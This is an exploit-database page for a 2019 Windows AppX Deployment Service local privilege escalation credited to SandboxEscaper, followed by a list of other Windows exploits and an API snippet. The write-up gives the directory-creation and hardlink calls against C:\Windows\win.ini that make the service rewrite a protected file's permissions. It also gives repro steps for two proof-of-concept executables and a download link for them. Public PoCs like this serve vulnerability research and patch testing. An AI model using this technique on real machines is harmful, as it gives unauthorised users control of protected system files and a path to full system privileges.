Menu

Search for hundreds of thousands of exploits

"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)"

Author

SandboxEscaper

Platform

windows

Release date

2019-05-23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
There is still a vuln in the code triggered by CVE-2019-0841

The bug that this guy found: https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/

If you create the following:

(GetFavDirectory() gets the local appdata folder, fyi)

CreateDirectory(GetFavDirectory() + L"\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe",NULL);
CreateNativeHardlink(GetFavDirectory() + L"\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe\\bear3.txt", L"C:\\Windows\\win.ini");

If we create that directory and put an hardlink in it, it will write the DACL.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe this part (i.e 44.17763.1.0) has to reflect the currently installed edge version, you will need to mofidy this in the PoC (polarbear.exe) if different.
You can find this by opening edge -> settings and scrolling down.
Best thing is to just create a folder and hardlink for all the recent edge versions when writing an exploit. But I guess you can also probably get the installed version programmatically.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


To repro:

1. Run polarbear.exe
2. Run windowsappslpe.exe (doesn't matter what file you pass in commandline.. will just make win.ini write-able.. rewrite the original PoC yourself)

Use the vide demo as guidance..

EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46938.zip
Release Date Title Type Platform Author
2019-09-16 "docPrint Pro 8.0 - SEH Buffer Overflow" local windows "Connor McGarr"
2019-09-16 "AppXSvc - Privilege Escalation" local windows "Gabor Seljan"
2019-09-06 "Windows NTFS - Privileged File Access Enumeration" local windows hyp3rlinx
2019-09-13 "Folder Lock 7.7.9 - Denial of Service" dos windows Achilles
2019-09-12 "Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts" dos windows "Google Security Research"
2019-09-12 "Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts" dos windows "Google Security Research"
2019-09-10 "Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)" local windows Metasploit
2019-09-10 "Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) (Metasploit)" local windows Metasploit
2019-09-02 "Kaseya VSA agent 9.5 - Privilege Escalation" local windows NF
2019-09-02 "ChaosPro 3.1 - SEH Buffer Overflow" local windows "Jonathan Crosby"
2019-09-02 "ChaosPro 2.1 - SEH Buffer Overflow" local windows "Jonathan Crosby"
2019-09-02 "ChaosPro 2.0 - SEH Buffer Overflow" local windows "Jonathan Crosby"
2019-08-30 "VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service" dos windows "James Chamberlain"
2019-08-30 "Asus Precision TouchPad 11.0.0.25 - Denial of Service" dos windows "Athanasios Tserpelis"
2019-08-30 "Easy MP3 Downloader 4.7.8.8 - 'Unlock Code' Denial of Service" dos windows "Mohan Ravichandran_ Snazzy Sanoj"
2019-08-30 "SQL Server Password Changer 1.90 - Denial of Service" dos windows "Velayutham Selvaraj_ Praveen Thiyagarayam"
2019-08-28 "Outlook Password Recovery 2.10 - Denial of Service" dos windows "Velayutham Selvaraj_ Praveen Thiyagarayam"
2019-08-26 "Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass" local windows "Google Security Research"
2019-08-26 "LSoft ListServ < 16.5-2018a - Cross-Site Scripting" webapps windows MTK
2019-08-19 "RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service" dos windows Achilles
2019-08-15 "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities" local windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream" dos windows "Google Security Research"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46938/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/46938/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46938/41362/microsoft-windows-appx-deployment-service-local-privilege-escalation-2/download/", "exploit_id": "46938", "exploit_description": "\"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)\"", "exploit_date": "2019-05-23", "exploit_author": "SandboxEscaper", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse